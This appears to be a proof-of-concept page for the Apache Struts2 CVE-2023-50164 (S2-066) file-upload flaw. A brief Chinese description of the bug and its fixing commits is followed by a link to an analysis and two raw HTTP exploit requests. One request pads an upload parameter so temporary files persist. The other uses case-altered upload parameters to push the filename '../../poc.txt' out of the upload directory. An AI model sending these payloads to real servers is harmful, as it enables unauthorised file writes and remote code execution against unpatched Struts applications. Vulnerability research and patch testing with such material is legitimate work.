58 lines
1.9 KiB
Markdown
58 lines
1.9 KiB
Markdown
## Apache Struts2 CVE-2023-50164
|
||
|
||
漏洞描述里提到可通过伪造文件上传的参数导致目录穿越,看版本比对,有两个 Commit 引起我的关注,一个是 Always delete uploaded file,另一个是 Makes HttpParameters case-insensitive。前者的作用是确保上传的临时文件被正确上传,在修复之前,通过构造超长的文件上传参数可以让临时文件继续留存在磁盘中;
|
||
|
||
## 漏洞复现分析
|
||
- https://trganda.github.io/notes/security/vulnerabilities/apache-struts/Apache-Struts-Remote-Code-Execution-Vulnerability-(-S2-066-CVE-2023-50164)
|
||
## poc
|
||
```
|
||
POST /s2_066_war_exploded/upload.action HTTP/1.1
|
||
Host: localhost:8080
|
||
Accept-Language: en-US,en;q=0.9
|
||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
|
||
Accept-Encoding: gzip, deflate, br
|
||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5WJ61X4PRwyYKlip
|
||
Content-Length: 593
|
||
|
||
------WebKitFormBoundary5WJ61X4PRwyYKlip
|
||
Content-Disposition: form-data; name="upload"; filename="poc.txt"
|
||
Content-Type: text/plain
|
||
|
||
test
|
||
|
||
|
||
------WebKitFormBoundary5WJ61X4PRwyYKlip
|
||
Content-Disposition: form-data; name="caption";
|
||
|
||
|
||
{{randstr(4097,4097)}}
|
||
|
||
------WebKitFormBoundary5WJ61X4PRwyYKlip--
|
||
```
|
||
|
||
|
||
```
|
||
POST /s2_066_war_exploded/upload.action HTTP/1.1
|
||
Host: localhost:8080
|
||
Accept-Language: en-US,en;q=0.9
|
||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
|
||
Accept-Encoding: gzip, deflate, br
|
||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5WJ61X4PRwyYKlip
|
||
Content-Length: 593
|
||
|
||
------WebKitFormBoundary5WJ61X4PRwyYKlip
|
||
Content-Disposition: form-data; name="upload"; filename="poc.txt"
|
||
Content-Type: text/plain
|
||
|
||
test
|
||
|
||
|
||
------WebKitFormBoundary5WJ61X4PRwyYKlip
|
||
Content-Disposition: form-data; name="uploadFileName";
|
||
|
||
../../poc.txt
|
||
|
||
------WebKitFormBoundary5WJ61X4PRwyYKlip--
|
||
|
||
```
|